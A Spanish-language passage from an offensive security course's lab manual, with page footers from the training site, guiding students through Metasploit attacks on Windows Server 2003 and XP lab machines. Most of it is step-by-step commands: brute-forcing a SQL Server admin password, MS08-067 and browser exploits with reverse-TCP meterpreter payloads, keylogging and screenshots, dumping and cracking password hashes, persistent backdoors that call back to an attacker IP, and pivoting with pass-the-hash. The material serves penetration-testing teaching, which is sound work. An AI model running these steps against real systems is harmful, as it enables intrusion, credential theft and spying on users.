      2005 SP1. Proceder a realizar el scanning de puertos, según los comandos de la siguiente
      imagen.




      Paso 2: Identificación de vulnerabilidades servicios MSSQL: El siguiente paso es realizar un
      proceso de identificación de vulnerabilidades, para el caso vamos a buscar vulnerabilidades en
                                   vulnerabilidades,
      el login y password del usuario SA (System Administrator) del sistema de bases de datos MS
                                                                            a                   MS-
      SQL SERVER. Para lograr identificar vulnerabilidades en cuanto a credenciales de acceso
      débiles, podemos usar el siguient
              ,                          siguiente modulo auxiliar de metasploit llamado
      auxiliary/scanner/mssql/mssql_login.
      auxiliary/scanner/mssql/mssql_login

      Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:
                                      debe

              use auxiliary/scanner/mssql/mssql_login
              show options
              set PASS_FILE /pentest/passwords/john/password.lst
              set RHOSTS 192.168.137.28 (Aquí colocas la dirección IP de Servidor Windows)
              set VERBOSE false
              show options
              exploit
                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Como se puede apreciar en las anteriores imágenes, en modulo auxiliar mssql_login logro
                                                                                mssql_login,
      identificar una contraseña débil para el usuario SA (System Administrator), que para el caso,
      la contraseña de acceso para el usuario SA es password

      Ir más allá: Para complementar este ejercicio, insertar realizar un análisis de vulnerabili
                                                                                      vulnerabilidades
      usando el Software NESSUS, revisar en los reportes de este software, que se identifican otro
      tipo de vulnerabilidades criticas que pueden ser explotadas usando Metasploit Framework.

      Paso 2: Identificación de vulnerabilidades servicios HTTP: Con herramientas diversas que
      pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de
      análisis de vulnerabilidades. Vamos a utilizar el software NETCAT para realizar un simple

                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      análisis de vulnerabilidades basado en la huella de identificación de una aplicación. Para poder
      usar netcat lanzamos el siguiente comando:

      nc 192.168.137.28 80 (Colocar la dirección IP de su sistema Windows Server)

      Lugo ejecutamos el siguiente comando
                                   comando:

      HEAD / HTTP/1.0

      Luego damos sobre enter, y debe de salir un mensaje similar al siguiente:




      En la anterior imagen se puede observar perfectamente que el servidor web del equipo
      Windows 2003 Server, es IIS 6.0, software que tiene muchísimas vulnerabilidades conocidas y
                                 S
      códigos de explotación para aprovecharse de dichas vulnerabilidades.

      Paso 3: Identificación de vulnerabilidades servicios SMB: Con herramientas diversas que
      pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de
      análisis de vulnerabilidades. Vamos a utilizar el software NMAP acompañado de uno de los
      script que existen para este software, con el fin de identificar vulnerabilidades ara el servicio
      SMB, puerto 445 TCP. Para poder usar nmap de la forma que lo necesitamos, lanzamos el
      siguiente comando:

      nmap --script smb-check-vulns.nse -p445 192.168.137.28 (Recordar cambiar la direccion IP
                              vulns.nse
      de su Windows Server)




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      En la anterior imagen se puede observar los resultados del comando ejecutado, donde se
      puede observar que se identifico una vulnerabilidad en el puerto 445 TCP.


      Práctica de laboratorio númer 5 "Explotación Básica"
                              número
      Objetivos: Aprovecharse de las vulnerabilidades encontradas en los pasos y servic
               :                                                                             servicios
      anteriores, con la configuración y ejecución de Exploits y PAYLOADS del tipos Server Side

      Recursos: VMWARE, Metasploit Framework, Windows Server 2003 y Backtrack 5

      Observaciones:
             Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
             Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping
             entre ambas maquinas.
             Es altamente importante tener conocimientos básicos medios al respecto de los
                                                                 básicos-medios
             servicios de red que se están atacando, para comprender mejor el trabajo de análisis
             de seguridad y/o penetration testing realizado.
             Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando
                                                                   estudiando
             con la ejecución de exploits dentro de metasploit.
             La vulnerabilidad MS 08
                                   08-07, aun puede verse en algunos equipos, pero en casos muy
                                                              n
             concretos y especiales tales como equipos XP-Server 2003 recién formateados, no
                          especiales,
             parchados, sin el firewall activo. Esta explotación no puede hacerse desde la WAN,
                        ,
             porque los routers de los ISP bloquean el trafico para puertos como el 445,139, etc. El
             EXPLOIT ms08-07 es altamente utilizado en las academias para cursos básicos y
                             07
             avanzados de hacking, para poder enseñar todas las funcionalidades de metasploit.
                          e


      Ejecución de la práctica de laboratorio 5
                                              5:


                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 1: Explotación de vulnerabilidades servicios SMB: Una vez identificada las
                          ción
      vulnerabilidades en diversos servicios de red, procedemos a realizar la respectiva explotación
      de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad
      identificada con NMAP y con NESSUS descrita como MS08 67, debemos realizar lo siguiente:
        entificada                                            MS08-67,
      (Para el siguiente ejercicio de explotación, tener presente el siguiente esquema:




              Ingresar a metasploit abriendo la interface msfconsole
                          metasploit,
              lanzar el comando search ne
                                        netapi
              Seleccionamos el Exploit exploit/windows/smb/ms08_067_netapi, y lo asignamos con
                                       exploit/windows/smb/ms08_067_netapi,
              el comando use windows/smb/ms08_067_netapi
              Luego se debe de indicar en la Shell de METASPLOIT la opción show options para
                                                                                     options,
              verificar las opciones del tipo variable que se requiere en este exploit, para poder
                          s
              explotar la vulnerabilidad. El resultado del comando, debe de ser similar al de la
              siguiente imagen:




              Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver
              resultados NMAP Anteriores), correspondiente al servicios CIFS/SMB, además que se
                                  Anteriores),
              necesita la dirección IP del equipo victima asignada.
              Para asignar la dirección IP de la víctima , debemos de ejecutar el siguiente comando:
              set RHOST Dirección IP Victima (192.168.119.225 por Ejemplo).


                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              Luego se debe de ingresar de nuevo el comando show options para verificar que en
              efecto el valor de la dirección IP de la víctima fue asignado a la variables RHOST.
              El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con est     este
              Exploit, para lo cual daremos el siguiente comando: show payloads
              Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio,
              y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente
              payload:
              windows/meterpreter/reverse_tcp
                             terpreter/reverse_tcp
              Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente
              comando: set PAYLOAD windows/meterpreter/reverse_tcp
              Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado.
              Luego debemos de dar e comando show options, para ver las opciones que se
                                          el                           ,
              necesita asignar al PAYLOAD elegido.
              El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente
              imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP del
              equipo Linux Backtrack)




              Para poder asignar el valor de la IP de Backtrack a la variables LHOST, se debe de
              ejecutar el siguiente comando: set LHOST Dirección IP Backtrack (Maquina Atacante)
              Se vuelve a ingresar el comando show options, para ver que en efecto la variable
                                                                         er
              LHOST quedo con la dirección IP de Backtrack Asignada.
              Luego ingresamos el comando show targets, para verificar todos los sistemas
                                                                 ,
              Windows que pueden ser explotados por este Exploit.
              Si hasta aquí todo va bien, no queda más que lanzar el ataque a la maquina victima
                                                           que
              (Maquina Con Windows XP Y/O Server 2003 ya que ambas estan vulnerables Para
                                                                                   vulnerables).
              lanzar el ataque, solo se debe de ingresar el siguiente comando: exploit
              Luego de que el exploit, se ejecuta el PAYLOAD que hemos elegido, dejándonos en la
              Shell de meterpreter de METASPLOIT. Tal y como se puede observar en la siguiente
              imagen:




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




                 Meterpreter tiene muchas opciones, pero para el caso, vamos a usar la opción que
                 me permite obtener una shell en el equipo víctima, lo cual podemos lograr
                 ingresando el siguiente comando en la consola de meterpreter: shell

              Nota: Antes de lanzar el comando shell, entrar al equipo víctima, como usuario final, y
              verificar por el administrador de tareas cuantos CMD.exe hay ejecutándose, luego
              hacer los mismo, pero después de lanzado el comando shell.
                cer

                 Luego de ejecutado el comando shell, el sistema debe de abrir la shell de
                 Windows XP y/o Server 2003 de la maquina victima (cmd--shell), justo como se
                                                                        shell),
                 muestra en la siguiente imagen.




      Anotación: si se presenta algún problema con la ejecución de la shell, digita desde la consola
        otación:
      meterpreter el comando getsystem, para escalar privilegios en el sistema atacado.
                               getsystem,

                 El siguiente paso es crear algunas carpetas en la raíz del disco C: del equipo
                 víctima, usando el comando mkdir. Luego se debe de ingresar al equipo víctima,
                 como si fuéramos un usuario normal del equipo, y verificar que en efecto se han
                 creado las carpetas. (Recordar crear la carpeta dentro del disco C, y no dentro de
                 system32, para efectos de facilidad en la visualización del directorio creado)

      Paso 2: Explotación de vulnerabilidades servicios MSSQL Server: En este segundo paso de
      explotación del lado server side, vamos a aprovecharnos de la vulnerabilidad identificada con
                                  side,
      la clave débil del usuario SA (System Administrator de SQL Server), la cual es password.
             e
      Además que vamos a ir avanzando en los procesos de post explotación utilizando las
                                                                   post-explotación
      diferentes herramientas que nos ofrece meterpreter.

      Para explotar la vulnerabilidad en men
                                          mención, debemos de hacer lo siguiente: (Para el siguiente
      ejercicio de explotación, tener presente el siguiente esquema)




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




                 realizar desde msfconsole una búsqueda con el comando search mssql
                 Luego en los resultados que nos aparece en pantalla, seleccionar el exploit
                 windows/mssql/mssql_payload
                 Asignar al metasploit el uso del exploit en mención con el comando: use
                 windows/mssql/mssql_payload
                 Luego vamos a buscar los PAYLOADS disponibles para este exploit con el comando
                 show payloads
                 Seleccionamos el PAYLOAD windows/meterpreter/reverse_tcp
                 Luego vamos a dar el comando show options para poder ver las opciones que nos
                 pide el Exploit y el Payload seleccionado. Las variables a asignar son:

                 PASSWORD --> aquí ponemos la clave vulnerable, la cual es password
                              >
                 RHOST--> aquí colocamos la IP de la victima
                 LHOST--> aquí colocamos la IP del atacante




                 Todas los valores a las anteriores variables, se asignan con el comando set

                 finalmente cuando todas las variables están asignadas, se ejecuta el comando
                 exploit
                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Jugando con Meterpreter: Teniendo presente que meterpreter tiene muchas funcionalidades,
      salimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter,
      comenzamos a usar varios comandos.




      Una vez desde meterpreter, lanzar los siguientes comandos:

                 Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr
                 con el comando ps desde las shell de meterpreter.
                                  ps,
                 Posteriormente debemos de identificar con que proceso nos pudimos colar en el
                 sistema victima Windows 2003 Server. Lo cual podemos identificar ejecutando el
                                                   Server.
                 comando: getpid, desde las shell de meterpreter. Luego ejecutamos de nuevo el
                 comando ps e identificamos el nombre del proceso con que ingresamos al sistema
                 víctima.
                 El siguiente paso es colocar en funcionamient un Keylogger en el equipo víctima,
                                                  funcionamiento
                 para poder registrar las pulsaciones del teclado.
                 Para lograr que el Keylogger funcione de manera adecuada, se debe de hacer lo
                                              r
                 siguiente:

                         Abrir en el equipo server 2003 el aplicativo notepad.
                         Volver al equipo atacante Backtrack y ejecutar de nuevo el comando ps,
                         para poder identificar con que ID esta el notepad ejecutándose.
                         Una vez que se identifique el ID del notepad, debemos de realizar un
                         proceso de migración del proceso con el cual hemos comprometido el
                         sistema ví
                                  víctima, al proceso que ejecuta el notepad en el mismo equipo
                         víctima.
                         Lo anterior lo logramos con la ejecución del comando migrate seguido del
                                                                                migrate,
                         ID identificado del proceso notepad.
                         Si sale algún mensaje de error por cuestiones de permisos, entonces
                         debemos de ejecutar el comando getsystem, para poder escalar privilegios
                                                                       ,
                         en la maquina víctima. Luego ejecutar de nuevo el comando migrate,
                                                 .
                         seguido del respectivo ID, y ya debe de realizar una migración exitosa.
                                                   ,
                         El siguiente paso es poner el keylogger en funcionamiento, con el siguiente
                                                                     funcionamiento,
                         comando: run keylogrecorder
                         Esperar unos segundos, y comenzar a escribir en el notepad de la víctima.
                         Luego darle control+c para detener el keylogger
                         Finalmente usar el comando cat desde una Shell nueva de Linux, para
                         visualizar las capturas de teclas, en la ruta indicada por el registro del
                         keylogger

                 Anotación: Recordar lanzar el comando cat desde una consola (Teminal) de
                 comandos diferente a la de metasploit tal y como se muestra en la siguiente
                 imagen.



                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




                  Entre otras de las opci
                                     opciones de meterpreter, también se puede registrar capturas
                  de pantalla de la víctima con el comando screenshot, lo cual se puede lograr con
                                                                     ,
                  los siguientes pasos:

      Ingresar al equipo víctima, y abrir el notepad y colocar lo siguiente:
                                ,

      Hola, mi número de tarjeta de crédito es: 12376666 y la clave es 123333
                             eta

                           Una vez que escribamos eso, regresamos a la shell de meterprter
                           (resultado en pasos anteriores de esta práctica) en Backtrack y ejecutamos
                           el siguiente comando: screenshot
                           De inmediato debe de salir en Backtrack, una copia de pantalla de la
                                                              Backtrack,
                           víctima, con lo cual el atacante podrá obtener información valiosa, y podrá
                           espiar a la víctima.

      Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los usuarios creados
      en el sistema víctima, lo cua podemos hacer con el comando hashdump desde la consola
                                 cual
      meterpreter




      Luego debemos de colocar estos hash en un archivo de texto para luego proceder a realizar un
                                   estos
      proceso de crack de password. Podemos copiar y pegar los hashes en la ruta
      /pentest/passwords/john. Una vez allí usamos el editor nano para guardar el archivo, y luego
                                 .
      procedemos a ejecutar el software crackead de password john the ripper, lo cual po
                                         crackeador                                      podemos
      realizar con el siguiente comando ./john hashwin
                                comando:




                                      © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Como se puede apreciar en la ima
                                   imagen, el passwords de Windows Server fue crackeado.
                                                      s

      Anotación: Los hash obtenidos también se pueden copiar y pegar en el siguiente sitio web
      y allí también pueden ser crackeados http://www.md5decrypter.co.uk
                                crackeados.




              Sin embargo lo anterior puede ejecutarse de una mejor forma, y más fácil usando
                                                        de
              metasploit, para los cual nos vam a ayudar de dos módulos auxiliares llamados:
                                            vamos                               es

              auxiliary/analyze/jtr_crack_fast
              post/windows/gather/credentials/credential_collector


                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              Para poder ejecutar estos dos módulos de forma paralela, se debe de continuar
                                                                             ,
              ejecutando los siguientes pasos:
              desde           msfconsole          seleccionar        el        módulo      auxiliar:
              post/windows/gather/credentials/credential_collector
              El anterior modulo se carga en metaspl con el siguiente comando:
                                                metasploit
              use post/windows/gathe
                   post/windows/gather/credentials/credential_collector.
              Luego se da el comando show options y se observa que se le debe de indicar alguna de
              las sesiones que se tengan activas en el moento, que para el caso deberíamos de tener
              dos, una sesión para la explotación d MSSQL y otra la explotación SMB.
              indicar la sesión activa con el siguiente comando: set SESSION 1
              Luego se ejecuta el modulo auxiliar con el comando run

              Como se puede observar en el siguiente resultado del comando, se obtienen todos los
              hash de los usuarios de Windo
                                      Windows.




              Luego se ejecuta el modulo auxiliar de metasploit auxiliary/analyze/jtr_crack_fast el
                                                                         /analyze/jtr_crack_fast,
              cual nos sirve para hacerle crack a todos los passwords de los usuarios del sistema
              víctima, que para el caso es Windows Server.
              Por último ejecutamos el módulo auxiliar con el comando run.




                                    © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              Finalmente observamos que el módulos nos obtuvo todas las contraseñas (Darle
              paciencia para obtener las contraseñas, ya que se demora un poco)




      Práctica de laboratorio númer 6 "Mas Meterpreter"
                              número
      Objetivos: Conocer y utilizar más funcionalidades de meterpreter a nivel de explotación y
                                                         e
      post- explotacion.

      Recursos: VMWARE, Metasploit Framework, Windows Server 2003, Windows XP SP2 y
                                                             2003,
      Backtrack 5

      Observaciones:
             Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
                                                                      las
             Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping
             entre ambas maquinas.
             Es altamente importante tener conocimientos básicos medios al respecto de los
                                                                 básicos-medios
             servicios de red que se están atacando, para comprender mejor el trabajo de análisis
                                                            comprender
             de seguridad y/o penetration testing realizado.
             Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando
             con la ejecución de exploits dentro de metasploit, y con la consola meterpreter
                               e


      Ejecución de la práctica de laboratorio 6
                                              6:

      Paso 1: Colocar una puerta trasera con meterpreter como servicio: Teniendo presente que
      meterpreter nos permite hacer muchísimas tareas de explotación y post explotación en la
                                                                              post-explotación
      maquina víctima, vamos a proceder a dejar a meterpreter como una puerta trasera en la
                                              dejar
      maquina víctima, para que nos permita conectarnos a la victima cada que necesitemos
      hacerlo, y no dependa la explotación directamente de una vulnerabilidad conocida, ya que
      esta puede ser solventada por el admi
                                       administrador de red. Para lograr esta tarea, se debe de hacer
      lo siguiente:

              Estar en una consola meterpreter, la cual se lora con la explotación de alguna
              vulnerabilidad conocida en la victima.

                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              Ejecutar el siguiente comando para colocar meterpreter como un servicios en la
              máquina victima, los cual se logra ejecutando el siguiente comando: run metsvc –A
              Luego debemos de ejecutar el exploit multi/handler, lo cual se logra ejecutando el
                                                                      ,
              siguiente comando: use exploit/multi/handler
              Posteriormente selecciona el siguiente PAYLOAD windows/metsvc_bind_tcp
              Para asignar este PAYLOAD al exploit, se ejecuta el siguiente comando: set PAYLOAD
              windows/metsvc_bind_tcp.
              windows/metsvc_bind_tcp
              Luego se le asignan las variables al exploit, que para el caso son RHOST y el puerto en
              el cual quedo a la escucha el servicio de meterpreter
              Luego se ejecuta el exploit




              Paso 2: Colocar una puerta trasera con meterpreter como servicio persistente
                                                                                       persistente:
              Teniendo presente que meterpreter nos permite hacer muchísimas tareas de
              explotación y post-explotación en la maquina víctima, vamos a proceder a dejar un
                                  explotación       maquina
              servicios persistente que este llamando al atacante por un puerto determ
                                                                                determinado, y cada
              tiempo determinado, lo cual se logra realizando lo siguiente:

                      ejecutar el siguiente comando: run persistence -A -S -U -i 60 -p 4321 –r
                                                                                  U
                      192.168.56.101 (Recordar que aquí se coloca la IP de Backtrack, que será
                      diferente para cada estudiante)
                      (Lo que hace el comando anterior, es básicamente lo siguiente Con la opción -
                       Lo                                                    siguiente:
                      A se coloca una conexión a la escucha en la maquina del atacant la opción -S
                                                                                 atacante,
                      garantiza que la puerta trasera que colocamos se inicie cada vez que la
                      maquina victima Windows arranque. Con la opción -i se asigna un intervalo de
                      tiempo para la conexión de la victima hacia el atacante, con la opción -p
                                                                                   ,
                      asignamos un puer en la maquina del atacante, y la opción -r indica la
                                       puerto                              ,
                      dirección IP el atacante donde esta una conexión a la escucha)




                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Práctica de laboratorio número 7 "Explotación Básica" del lado del cliente
                              número
      Objetivos: Aprender cómo trabajan y se ejecutan los procesos de explotación del lado del
                                                          procesos
      cliente (Client Sie)

      Recursos: VMWARE, Metasploit Framework, Windows XP SP2 y Backtrack 5
                          tasploit

      Observaciones:
             Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
             Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping
             entre ambas maquinas.
             Es altamente importante tener conocimientos básicos medios al respecto de los
                                                                 básicos-medios
             servicios de red que se están atacando, para comprender mejor el trabajo de análisis
             de seguridad y/o penetration testing realizado.
             Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando
             con la ejecución de exploits dentro de metasploit, y con la consola meterpreter



      Ejecución de la práctica de laboratorio 7
                                              7:

      Paso 1: Explotación de Internet Explorer (Aurora): Comenzando con los procesos de
                      tación
      explotación del lado del cliente, vamos a usar un exploit que se aprovecha de una
      vulnerabilidad conocida en Internet explorer, conocida como operacion aurora Para ejecutar
                            da                                              aurora.
      este exploit, debemos de realiza lo siguiente:

              Seleccionar el exploit exploit/windows/browser/ms10_002_aurora
              Asignarlo       a      la      consola    con    el     comando:                  use
              exploit/windows/browser/ms10_002_aurora
              seleccionar un PAYLOAD, para el caso vamos a usar set                        payload
              windows/meterpreter/reverse_tcp
                             erpreter/reverse_tcp
              set URIPATH /
              set LHOST 192.168.33.129
              set LPORT 443
              exploit


                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Paso 2: Explotación de navegadores con el modulo Browser autopwn Continuando con los
                                                                    autopwn: ntinuando
      procesos de explotación del lado, ahora vamos a configurar el exploit llamado use
       rocesos                        lado,
      auxiliary/server/browser_autopwn el cual se aprovecha de vulnerabilidades conocidas de
          liary/server/browser_autopwn,
      varios navegadores. Para ejecutar este exploit, debemos de realiza lo siguiente:


              Seleccionar el exploit auxiliary/server/browser_autopwn
              Asignar este exploit con el coman
                                              comando use Para asignar este exploit, debemos de
              ejecutar el siguiente comando: use exploit auxiliary/server/browser_autopwn
              Luego se debe de asignar la variable LHOST y la variable URIPATH.
              Finalmente se le da el comando exploit, y se le envía a la victima la URL del servidor
              web que acaba de cargar metasploit.

      Anotación: hay que darle un poco de paciencia a la ejecución de este exploit ya que lanza
      varios códigos de explotación y al final nos muestra las sesiones que logro abrir en la máquina
      víctima.




      Práctica de laboratorio númer 8 "Pivoting"
                              número
      Objetivos: Aprender cómo se realiza el proceso de pivoting entre dos subrede
                                             proceso

      Recursos: VMWARE, Metasploit Framework, Windows ServerWindows XP SP2 y Backtrack 5
                          tasploit                          Windows

      Observaciones:

                                     © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




              Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y
              Windows 2003 y XP, están conectados en el mismo segmento de red, y que hay ping
              entre ambas maquinas.
              Esta práctica debe de hacerse desde dos maquinas físicas, 4 maquinas virtuales

      Anotación general de la práctica 8:
                     al

      Para la siguiente practica, se debe de tener presente el siguiente escenario:




      Nota: Tener presente que en el esquema anterior los puntos rojos representan dos tarjetas de
      red en el servidor Windows 2003, cada una de ellas debe de esta configurada con diferentes
      subredes (Segmentos de red). La que está conectada al segmento de red que está en bridge,
      esta suministrada directamente por el servidor DHCP de la maquina local. Y la otra tarjeta
      podemos asignarle una dirección IP como la 10.0.0.1 mascara 255.255.255.0. Tener presente
      primero prender el Windows server y renombrar la tarjeta de red actual como WAN, y la otra
      que se va a crear, se renombra como LAN
                                          LAN.

      Es altamente importante ensayar que el si se presente ping entre los diferen
                                                                           diferentes segmentos
      de red antes de comenzar la práctica.

      Pasos para ejecutar la práctica:

      Los pasos que se deben de realizar paso para poder lograr el proceso de pivoting en la
      maquina victima (Windows XP Victima final) es el siguiente:

      1) Lo primero es configurar las tarjetas de red para el laboratorio, las cuales se configuran de la
                           igurar
      siguiente manera:

                                      © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Windows Server: debe de tener dos tarjetas de red una conectada en modo bridge, y la
      segunda la vamos a conectar en modo VMNET2. Justo como se puede apreciar en la siguiente
      imagen.




      Recordar que la que está en bridge, obtiene DHCP por medio de la red LAN, y la que está en
      VMNET2 se le configura manualmente una 10.0.0.1/24.

      Luego se configura la maquina Windows XP y la tarjeta de red también la colocamos co   como
      VMNET2, y asignamos otra Dirección IP del mismo rango que en Windows server, la cual
      puede ser 10.0.0.11/24. Tener presente colocarle en la configuración de la tarjeta de red de
      Windows XP como servidor DNS y puerta de enlace la dirección IP de Windows Server.

      2) Una vez configuradas las tarjetas de red, el siguiente paso es integrar a Windows XP al
      dominio que se encuentra en Windows Server 2003.

      3) El tercer paso es vulnerar a Windows Server por su tarjeta de red configurada en modo
      Bridge. Lo anterior se hace desde Linux BT5. Recordar que BT5 debe de estar configurado
                         or
      también en modo Bridge, y por el segmento de red de Windows Server. Se recomienda usar un
      exploit al cual sea vulnerable, y en el PAYLOAD usar Windows Meterpreter Reverse TCP.

      4) El cuarto paso es averiguar cuantas tarjetas de red tiene el equipo víctima, y la configuración
             uarto
      de estas. Si todo va hasta aquí bien, se deben de identificar 2 tarjetas de red
                                                                                  red.

      Adicionalmente desde meterpreter se puede lanzar el comando run arp_scanner –r
      10.0.0.0/24.

      Con el anterior comando se puede identificar otros host conectados al segmento de red
      alterno del servidor 2003.

      5) Salir de meterpreter con el comando background para proceder a agregar una ruta a
      nuestra maquina, lo cual hacemos con el siguie
                                              siguiente comando:

      route add 10.0.0.0 255.255.255.0 1 (ojo el ultimo 1 pertenece a la sesión que se abrió con
      Meterpreter)

      Luego damos el comando route print para ver la ruta.


                                      © www.dsteamseguridad.com
Certified Offensive and Defensive Security Professional -CODSP Training




      Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes comandos:

      run autorun –h y luego
      run autoroute –s 10.0.0.0/24
                     s

      O también puede usarse el modulo auxiliar llamado post/windows/manage/autoroute
                                                              post/windows/manage/autoroute.
      Este nos va a solicitar la sesión abierta y la subred a la cual queremos enrutarnos

      6) Una vez que se tiene la ruta, el siguiente paso es sacar los Hash de los usuarios del dominio
                               a
      llamado METASPLOIT. Lo anterior ya se vio en prácticas de laboratorio pasadas.
                             o

      7) El siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso del
      modulo auxiliar de Metasploit llamado auxiliary/scanner/portscan/tcp. Este módulo nos pide
                                     llamado:                                 .
      los puertos, que para el caso vamos a darle 80,135,139,445, y nos pide la víctima que para el
                                                                                 víctima,
      caso solo vamos a comenzar el Scanning desde la IP 10.0.0.1 hasta la 10.0.0.15. Luego le
      damos run, y si todo va bien, debemos de ver la IP 10.0.0.11, perteneciente a Windows XP, con
      todos sus respectivos puertos abiertos.

      Lanzar exploit:

      8) Se puede proceder a lanzar de nuevo el exploit NETAPI, pero esta vez se realiza contra el
      equipo Windows XP, pero esta vez se debe de ejecutar el PAYLOAD meterpreter/bind_tcp

      Optativo: Lanzar otro exploit:

      9) También podemos lanzar otro ataque al protocolo SMB, lo cual podemos realizar con el
      PAYLOAD llamado: exploit/windows/smb/psexec Cuando seleccionemos este PAYLOAD, se le
                         exploit/windows/smb/psexec.                 ccionemos
      deben de asignar las siguientes variables (Tener presente que para este exploit se requiere de
      los hash que obtuvieron en pasos anteriores de esta práctica).

      RHOST: 10.0.0.11
      SMBUser administrator
      SMBPass se le coloca el hash obtenido en puntos anteriores de esta práctica (Ojo copiar y
      Pegar el HASH, en lo que respecta al contenido que esta antes de :::)
      SMBDomain (Colocar el nombre del dominio, el cual debe de ser METASPLOIT)
      Y por último el PAYLOAD, el cual es Meterpreter/bi
                                          Meterpreter/bind_tcp.
      Finalmente se ejecuta con el comando run




                                       © www.dsteamseguridad.com

More Related Content

What's hot

Karmetasploit - Entorno de entrenamiento de seguridad informática
Karmetasploit - Entorno de entrenamiento de seguridad informáticaKarmetasploit - Entorno de entrenamiento de seguridad informática
Karmetasploit - Entorno de entrenamiento de seguridad informáticaDaniel
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03Tensor
 
Manual optix pro v3
Manual optix pro v3Manual optix pro v3
Manual optix pro v3selvasalud
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Pruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit FrameworkPruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Telefónica
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Lliure x guard_es
Lliure x guard_esLliure x guard_es
Lliure x guard_esosorvilo
 
Ej09.uso segurodewindows7
Ej09.uso segurodewindows7Ej09.uso segurodewindows7
Ej09.uso segurodewindows7isaacdiaz9
 
Ps tools
Ps toolsPs tools
Ps toolswebsyo
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Telefónica
 
Ethical hacking 04a
Ethical hacking 04aEthical hacking 04a
Ethical hacking 04aTensor
 
Linux Kernel - System Calls - Modules - Drivers
Linux Kernel - System Calls - Modules - DriversLinux Kernel - System Calls - Modules - Drivers
Linux Kernel - System Calls - Modules - DriversMartin Baez
 
Ethical hacking 00a
Ethical hacking 00aEthical hacking 00a
Ethical hacking 00aTensor
 
97 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.0
97 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.097 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.0
97 Php. Instalacion De My Sql 4.1 Y Ms Sql 5.0José M. Padilla
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Yolanda Ruiz Hervás
 

What's hot (20)

Karmetasploit - Entorno de entrenamiento de seguridad informática
Karmetasploit - Entorno de entrenamiento de seguridad informáticaKarmetasploit - Entorno de entrenamiento de seguridad informática
Karmetasploit - Entorno de entrenamiento de seguridad informática
 
Informe ataque troyano OPTIX PRO
Informe ataque troyano OPTIX PRO Informe ataque troyano OPTIX PRO
Informe ataque troyano OPTIX PRO
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
